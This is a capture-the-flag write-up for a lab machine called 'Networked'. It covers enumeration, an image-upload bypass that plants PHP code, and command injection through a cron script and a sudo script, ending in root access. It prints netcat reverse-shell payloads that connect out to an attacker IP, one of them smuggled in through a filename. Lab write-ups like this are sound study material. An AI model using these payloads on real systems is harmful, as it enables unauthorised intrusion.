# NETWORKED | 10.10.10.146

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.146

### Open Ports and Their Services

* 22 - SSH - OpenSSH 7.4
* 80 - HTTP - Apache 2.4.6 (CentOS) - PHP 5.4.16

## Services Enumeration

### 22 - SSH

Standard SSH server setup - we'll need valid credentials to access the machine this way.

### 80 - HTTP

There is not much on the main page - but viewing the source gives me a hint about other potential directories:

![](img/port-80-source.png)

The actual directories are `upload.php` and `photos.php` - as well as a `/backup` directory - according to a gobuster search:

![](img/backup.png)

In the tar file is a backup of the website's source code; this is helpful because it allows me to see that the upload page will check to make sure I upload an image file, as well as one that is not too large. I suppose that means I need to fool it somehow, either with a php reverse shell or something more simple so that I can execute commands.

## Exploitation

### PHP Command Injection

So I went about this upload restriction bypass thing pretty systematically I think. I first tried simply uploading a php file. Then I tried any number of different php files that had different extensions (php4, phtml etc). Then I tried a file like `shell.php.png`; also `shell.png.php`; then I tried adding php code to the beginning and end of a real image. This also did not appear to work but I needed to try harder. I had to learn many ways of executing php, since I do not know the language at all.

I ended up having to do two things: first, the image had to have an extension like so - "image.php.png"; then I had to add simple php code (I used the `passthru` function) at the end of all the image stuff. For ease I did this using BurpSuite so I could try many variations. When I hit on the correct combo, I had successful code execution:

![](img/ce1.png)
![](img/ce2.png)

Naturally, the next thing to try is to get a reverse shell. I will try netcat first because that's my favourite.

At the bottom of all the image code in the http request (that I sent to repeater in Burp), I put this code:

    <?php passthru("nc -e /bin/bash 10.10.14.23 6969"); ?>

When I refreshed the image gallery (didn't even have to go directly to the image), I had a shell:

![](img/apache-shell.png)

## User Enumeration

I am the apache user on this machine, and I do not have privileges to read the user flag, which belongs to the user 'guly'. You can see here in their home dir I will not be able to access the flag file:

![](img/guly.png)

Which means I'll have to escalate my privileges somehow to become root or guly. In their home dir there is conveniently a crontab, which shows that every 3 minutes the php script called 'check_attack.php' is run by guly. I do not have write access to this script, so I will have to find a way to abuse this knowledge somehow.

![](img/crontab-guly.png)

## Privilege Escalation via Command Injection

![](img/rm.png)

So the vulnerability in that php script is that it appends the filename to the `rm` command without any filtering - there is nothing stopping me from creating a file that starts with a semicolon which will separate the $path and $value. If I put a reverse shell command in there by creating a filename in the uploads directory then the crontab will execute it for me.

    touch '; nc -c bash 10.10.14.23 7777'

Then, after waiting a couple of minutes, I had a shell as guly:

![](img/guly-shell.png)

### Flag

![](img/guly-flag.png)

## User Enumeration

Of course, the first thing I do is see if I can `sudo -l`:

![](img/sudo-l.png)

And I see I can execute a shell script as root without giving my password.

So I just ran the script with sudo and it asks for several variables. In the script, the variables are not quoted so if I put in something like `<anything> <command>` for the NAME variable, the script takes that input and executes it. 

![](img/changename.png)

Check out this test:

![](img/test.png)

We can see the script running the `whoami` command as root.

## Privilege Escalation via Command Injection (Again)

What happens if I replace that innocent `whoami` with `bash`?

![](img/root-shell.png)

I become root, that's what.

### Flag

![](img/root-flag.png)

## Conclusion

Had to look up quite a lot for this box specifically, since I haven't yet found a good resource for command injection, so I used a writeup and took this one as a learning experience. I will continue to search for more background on Command Injection so I am able to recognize it when I see it.

Steps taken:

* Gain limited shell via php command injection in an image upload service
* Escalate to user via command injection in unquoted variables
* Escalate to root via command injection in unquoted variables (omg a pattern)
